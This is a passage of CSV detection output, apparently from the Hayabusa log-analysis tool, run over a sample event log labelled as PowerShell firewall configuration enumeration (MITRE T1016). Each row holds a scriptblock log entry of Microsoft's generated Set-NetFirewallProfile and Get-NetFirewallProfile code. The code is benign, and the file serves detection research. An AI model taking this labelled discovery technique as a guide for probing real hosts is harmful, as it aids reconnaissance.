[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,ization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = 
${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 
